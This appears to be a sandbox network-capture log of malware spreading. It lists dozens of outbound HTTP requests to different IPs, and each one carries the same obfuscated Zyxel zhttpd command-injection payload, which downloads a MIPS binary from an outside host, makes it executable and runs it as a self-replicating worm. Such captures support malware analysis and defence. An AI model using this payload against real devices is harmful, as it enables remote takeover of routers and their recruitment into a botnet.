                                                Jan 12, 2024 18:24:39.959512949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5356192.168.2.1358456211.127.161.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959574938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5357192.168.2.134901672.208.193.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959636927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5358192.168.2.135974463.160.104.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959685087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5359192.168.2.1338300203.195.147.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959744930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5360192.168.2.1360404218.173.106.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959774971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5361192.168.2.1349466139.160.80.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959830999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5362192.168.2.1352888190.225.99.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959882021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5363192.168.2.135429670.253.121.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959942102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5364192.168.2.13396145.60.8.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.959979057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5365192.168.2.1344644101.183.203.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960041046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5366192.168.2.1343164186.44.30.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960062981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5367192.168.2.1341896148.132.101.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960131884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5368192.168.2.1357950209.178.37.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960197926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5369192.168.2.1355462222.140.66.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960262060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5370192.168.2.1352170196.32.107.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960308075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5371192.168.2.1339474181.140.205.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960387945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5372192.168.2.1355460139.19.135.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960422993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5373192.168.2.1344022200.15.243.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960489988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5374192.168.2.134766460.179.204.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960544109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5375192.168.2.1356432191.45.175.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960613012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5376192.168.2.13446461.95.181.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960688114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5377192.168.2.1356226129.200.76.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960721016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5378192.168.2.134765218.172.249.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960788012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5379192.168.2.134490061.73.0.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960830927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5380192.168.2.1357254213.232.125.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960891962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5381192.168.2.135268065.99.89.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.960957050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5382192.168.2.135638234.111.73.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961030006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5383192.168.2.1333884116.53.181.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961098909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5384192.168.2.13469004.61.191.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961154938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5385192.168.2.135152218.142.70.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961209059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5386192.168.2.1347826204.83.193.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961285114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5387192.168.2.1335036219.73.234.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961337090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5388192.168.2.135177669.128.197.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961395025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5389192.168.2.134323617.173.4.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961457968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5390192.168.2.1332800163.125.14.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961520910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5391192.168.2.1355976138.62.26.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961563110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5392192.168.2.1341090157.103.229.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961616039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5393192.168.2.1335608143.13.146.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961685896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5394192.168.2.133859642.239.204.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961723089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5395192.168.2.1336978163.4.86.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961792946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5396192.168.2.133665271.244.215.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961855888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5397192.168.2.134338090.138.111.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961916924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5398192.168.2.1351856220.103.198.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.961981058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5399192.168.2.134285674.31.110.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962044001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5400192.168.2.134735241.97.173.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962088108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5401192.168.2.13593829.197.68.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962137938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5402192.168.2.1346914168.185.106.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962191105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5403192.168.2.13512341.41.178.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962268114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5404192.168.2.1352360118.161.226.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962333918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5405192.168.2.1350070200.168.246.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962408066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5406192.168.2.1350312166.119.146.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962460995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5407192.168.2.134254871.101.253.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962498903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5408192.168.2.1335812211.215.199.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962562084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5409192.168.2.135841243.166.173.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962610006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5410192.168.2.1351070110.118.86.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962682962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5411192.168.2.1354496155.37.172.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962724924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5412192.168.2.1348534168.225.212.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962778091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5413192.168.2.134386031.119.242.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962825060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5414192.168.2.135344666.176.189.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962855101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5415192.168.2.1338482194.1.230.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962918043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5416192.168.2.135306685.221.52.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.962971926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5417192.168.2.134973267.98.72.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:39.963038921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5418192.168.2.133894019.44.242.210443
                                                TimestampBytes transferredDirectionData
